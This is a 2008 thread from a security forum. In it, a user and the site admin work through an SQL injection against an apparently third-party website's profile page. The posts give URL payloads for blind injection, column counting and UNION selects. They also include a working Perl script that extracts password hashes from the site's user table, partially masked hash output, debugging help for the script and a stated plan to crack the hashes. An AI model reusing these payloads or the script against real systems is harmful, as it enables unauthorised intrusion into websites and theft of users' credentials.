Waraxe IT Security Portal
Login or Register
July 23, 2024
Menu
Home
Logout
Discussions
Forums
Members List
IRC chat
Tools
Base64 coder
MD5 hash
CRC32 checksum
ROT13 coder
SHA-1 hash
URL-decoder
Sql Char Encoder
Affiliates
y3dips ITsec
Md5 Cracker
User Manuals
AlbumNow
Content
Content
Sections
FAQ
Top
Info
Feedback
Recommend Us
Search
Journal
Your Account
User Info
Welcome, Anonymous
Nickname
Password
(Register)

Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9144

People Online:
Visitors: 221
Members: 0
Total: 221
Full disclosure
CyberDanube Security Research 20240722-0 | Multiple Vulnerabilities in Perten/PerkinElmer ProcessPlus
[KIS-2024-06] XenForo <= 2.2.15 (Template System) Remote Code Execution Vulnerability
[KIS-2024-05] XenForo <= 2.2.15 (Widget::actionSave) Cross-Site Request Forgery Vulnerability
CVE-2024-33326
CVE-2024-33327
CVE-2024-33328
CVE-2024-33329
CyberDanube Security Research 20240703-0 | Authenticated Command Injection in Helmholz Industrial Router REX100
SEC Consult SA-20240627-0 :: Local Privilege Escalation via MSI installer in SoftMaker Office / FreeOffice
SEC Consult SA-20240626-0 :: Multiple Vulnerabilities in Siemens Power Automation Products
Novel DoS Vulnerability Affecting WebRTC Media Servers
APPLE-SA-06-25-2024-1 AirPods Firmware Update 6A326, AirPods Firmware Update 6F8, and Beats Firmware Update 6F8
40 vulnerabilities in Toshiba Multi-Function Printers
17 vulnerabilities in Sharp Multi-Function Printers
SEC Consult SA-20240624-0 :: Multiple Vulnerabilities allowing complete bypass in Faronics WINSelect (Standard + Enterprise)
Log in Register Forum FAQ Memberlist Search
IT Security and Insecurity Portal

www.waraxe.us Forum Index -> Sql injection -> Help with SQL injection.. (The used SELECT statements .... )
Post new topicReply to topic View previous topic :: View next topic
Help with SQL injection.. (The used SELECT statements .... )
PostPosted: Sat Dec 13, 2008 6:17 pm Reply with quote
ingh1pped
Advanced user
Advanced user
Joined: Dec 13, 2008
Posts: 88




hello and thanks if you can help me.
i found a site vuln, i think.
but when i numbered the columns with order by it's all ok.
just 3 columns

then i try
profilo.php?uid=-1 UNION SELECT null,null,null /*
or
profilo.php?uid=-1 UNION SELECT 1,2,3/*

or with -- or with all select and i have just the same answer :

The used SELECT statements have a different number of columns

if i use from users the answer is
Table '*****.users' doesn't exist

but from utenti is good.
The used SELECT statements have a different number of columns
i found less info for this problem.
its a problem of the structure of the query and the union select statement?^

thanks to all!
Rolling Eyes
View user's profile Send private message
PostPosted: Sat Dec 13, 2008 8:50 pm Reply with quote
waraxe
Site admin
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu




Best way is step-by-step approach. First step is getting syntax right.
Use "uid" with valid,working value, for example 523:

Code:

profilo.php?uid=523/*


No sql syntax errors? Can you see normal page?
Next try blind injections:

Code:

profilo.php?uid=523+AND+1=1/*


You should see normal page.

Code:

profilo.php?uid=523+AND+1=2/*


This must be different page, probably partially empty.

Code:

profilo.php?uid=523+AND+LENGTH(@@version)>1/*


This must be normal page again.

If your test results are as expected, then exploitable sql injection is
confirmed and next step is to try injection with visual feedback.
View user's profile Send private message Send e-mail Visit poster's website
PostPosted: Sat Dec 13, 2008 10:35 pm Reply with quote
ingh1pped
Advanced user
Advanced user
Joined: Dec 13, 2008
Posts: 88




great waraxe..
i have made all your passage and i confirm your test
it's positive.
we can try ....
thks, thks, tks..!!!
your are the number one..
i will understand blinded sql...

then
after

profilo.php?uid=523+AND+LENGTH(@@version)>1/*

normal page
how i proceed?
tks waraxe.... try injection together?
View user's profile Send private message
PostPosted: Sat Dec 13, 2008 10:51 pm Reply with quote
waraxe
Site admin
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu




Next try to find valid column count:

Code:

profilo.php?uid=-1+UNION+SELECT+1/*



Code:

profilo.php?uid=-1+UNION+SELECT+1,2/*



Code:

profilo.php?uid=-1+UNION+SELECT+1,2,3/*


Keep incrementing columns count. It can be large number, even >50!
And look for feedback. You can try test strings:

Code:

profilo.php?uid=-1+UNION+SELECT+0x74657374,0x74657374,0x74657374/*


Look for "test" in response page html source!
And if you get error message, do you see reference to the affected code line? Pay attention to that line number. If it's different for various column numbers, then this means, that sql injection occurs in multiple sql queries and they need different column number ... actually it's pretty common phenomena in real world sql injection exploitings Smile
Anyway, your goal is to get working feedback! Sql error does not always mean failure, because other sql query can still succeed in case of multiple queries! So ... look for feedback Smile
View user's profile Send private message Send e-mail Visit poster's website
PostPosted: Sun Dec 14, 2008 10:33 am Reply with quote
ingh1pped
Advanced user
Advanced user
Joined: Dec 13, 2008
Posts: 88




Quote:
Keep incrementing columns count. It can be large number, even >50!


and this is the problem.. from union select 1 to union select 1, ... 60 the answer is always...
The used SELECT statements have a different number of columns

-----

with this
-1+UNION+SELECT+0x74657374,0x74657374,0x74657374/*
the result is the same...
The used SELECT statements have a different number of columns... from 1-2-3 to >60...
is always a blank page without html source and only that phrase.
The only difference in the page is with precedent tecnique..
profilo.php?uid=523+AND+LENGTH(@@version)>1/*
-------
and obviously.. if i put
profilo.php?uid=-1 order by 1234/*

i obtain
Unknown column '1234' in 'order clause'

but with order by 3/* i obtain a regular page....
then i think there are 3 columns.
trying union select 1,2,3/*

find the message:
The used SELECT statements have a different number of columns

WTF!! Rolling Eyes Rolling Eyes
i think it's only eploitable with a blind sql , bruteforcing the ascii value of something.. Exclamation
EXAMPLE
profilo.php?uid=1 union select pass,2,3 from utenti/*
Unknown column 'pass' in 'field list'
profilo.php?uid=1 union select password,2,3 from utenti/*
The used SELECT statements have a different number of columns (It' good !! ?? )
profilo.php?uid=1 union select username,2,3 from utenti/*
Unknown column 'username' in 'field list'

profilo.php?uid=1 union select nick,2,3 from utenti/*
The used SELECT statements have a different number of columns (it's good !!??!)

therefore the columns is nick , password, and other i find in the login form like uid.
TKS waraxe for your patience!!!
i hope you give me some genius idea.... Laughing Laughing
View user's profile Send private message
PostPosted: Sun Dec 14, 2008 11:05 am Reply with quote
maku234
Regular user
Regular user
Joined: Jun 03, 2007
Posts: 21
Location: estonia




Quote:
but with order by 3/* i obtain a regular page....
then i think there are 3 columns.
trying union select 1,2,3/*

find the message:
The used SELECT statements have a different number of columns


If you but order by 4/* do you also get regular page ?
And in that case increase the number until you get error.
View user's profile Send private message
PostPosted: Sun Dec 14, 2008 11:19 am Reply with quote
ingh1pped
Advanced user
Advanced user
Joined: Dec 13, 2008
Posts: 88




Quote:
If you but order by 4/* do you also get regular page ?
And in that case increase the number until you get error.


no, no.. i know.
if i put 4 i obtain unknow columns 4 ... etc etc like order by 1234/*

then i think there are only 3 columns. But i always obtain these stupid phrase with the select statemente error
i think it 's a problem with the structure of the simple query union. It' s not accepted.. i should try to blind or to make another type of query in the url, but i don't know how, in this moment. I will think.
View user's profile Send private message
PostPosted: Sun Dec 14, 2008 2:47 pm Reply with quote
waraxe
Site admin
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu




Your best choice is probably blind injection. Write your own perl/php/etc script for this (it's my personal favorite approach) or use one of the many sql injection tools, available for download for free Smile
For example take on of my exploits:

http://www.waraxe.us/ftopict-3302.html

This is allready ~75% ready-to-use script for yout goal, just some modifications are needed Wink
View user's profile Send private message Send e-mail Visit poster's website
PostPosted: Sun Dec 14, 2008 4:12 pm Reply with quote
ingh1pped
Advanced user
Advanced user
Joined: Dec 13, 2008
Posts: 88




fantastic, waraxe... i've just looking some times ago in your portal for tool..
i see again and try to adapt and modify some code...
very, very tks!!
if I win the "battle" i post the beautiful notice and the eventual solution....
see you !!! Wink
View user's profile Send private message
PostPosted: Sun Dec 14, 2008 5:39 pm Reply with quote
ingh1pped
Advanced user
Advanced user
Joined: Dec 13, 2008
Posts: 88




WOW EXPLOIT
i've made a simple blind in perl with my friend athos.

this is the source

Code:
#!/usr/bin/perl -w
use strict;
use LWP::Simple;
my $a;
my $host = "http://********/profilo.php?uid=";
my @chars = (48..57, 97..102);

for my $i(1..32) {
foreach my $ord(@chars) {

$a = get($host."1+and+ascii(substring((select+password+from+utenti+where+uid=1),$i,1))=$ord--");

if($a !~ /non esiste/i) {
syswrite(STDOUT,chr($ord));
$i++;
}
}
}


changed the array beacuse i don't know if the password is md5 or not...
and the result is..

******@localhost:~/Desktop$ perl brute.pl
d1ddca4dd71dd6ee444*********

i think that i win loooool

tks to all and expecially to waraxe..
see you later.... bye
Laughing
View user's profile Send private message
PostPosted: Sun Dec 14, 2008 5:41 pm Reply with quote
waraxe
Site admin
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu




Cool Smile
View user's profile Send private message Send e-mail Visit poster's website
PostPosted: Sun Dec 14, 2008 7:49 pm Reply with quote
ingh1pped
Advanced user
Advanced user
Joined: Dec 13, 2008
Posts: 88




seems it's no finished... it's an other problem.. Crying or Very sad
WTF ?
this is the result---

+++++@localhost:~/Desktop$ perl blindsql.pl
d1ddca4dd71dd6ee444dd331664881bcbcc32ddd4cecee

how is it possible 46 caracthers? why the exploit not stopping it self to 32 ?
This is for the uid=1
For the uid=2
this is the result: 54 caratteri
0ff74efeffb3eee0661363662ddacca047b47b7bb1ff74bb5cecee
i try with uid 3 ? loooooool

however the injection is good
for example
profilo.php?uid=1+and+ascii(substring((select+password+from+utenti+where+uid=1),1,1))=100--

(100 is ascii for the letter "d") is OK, the page is loaded ... otherwise with

profilo.php?uid=1+and+ascii(substring((select+password+from+utenti+where+uid=1),1,1))=101--
(101 is ASCII for the letter "e")

there is an error.
so i think it's a good tecnique.
But how is possible that extract more of 32 chars? probably the pass in the db isn't md5? so i must try other array of chars? other pass lenght? in the exploit?=
How can i modify this script ?

TKS an other time to all and to waraxe.

EDIT
uid 3 8dd788149e49e9ee8dd88cc0267ae267ae67ae7aeaee4cc85cc2bb7ff65bbb 62 chars
???????
uid 4 ? growing 8 chars every uid ?
View user's profile Send private message
PostPosted: Sun Dec 14, 2008 11:53 pm Reply with quote
waraxe
Site admin
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu




This is why almost any scripts and programs need debugging and tweaking. In specific case there seems to be logic errors in execution flow. Like ...

Code:

if($a !~ /non esiste/i) {
syswrite(STDOUT,chr($ord));
$i++;


Maybe you need "last" operator after "$i++"? At least from performance point of view, because after valid char for current position is found, there is no need for looking further at same position. And use debug messages, so that you can see visual feedback from script at every step Smile
View user's profile Send private message Send e-mail Visit poster's website
PostPosted: Mon Dec 15, 2008 12:19 am Reply with quote
ingh1pped
Advanced user
Advanced user
Joined: Dec 13, 2008
Posts: 88




great waraxe....
you are the best!!! incredible..
like break in C language.
exactly.. why i didn't think so.. loool
Rolling Eyes

hash is ok..
i probably open a new topic in the right section for hashes that 's no cracked.
Wink
View user's profile Send private message
Help with SQL injection.. (The used SELECT statements .... )
www.waraxe.us Forum Index -> Sql injection
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
All times are GMT
Page 1 of 1

Post new topicReply to topic


Powered by phpBB 2001-2008 phpBB Group



Space Raider game for Android, free download - Space Raider gameplay video - Zone Raider mobile games
All logos and trademarks in this site are property of their respective owner. The comments and posts are property of their posters, all the rest (c) 2004-2024 Janek Vind "waraxe"
Page Generation: 0.139 Seconds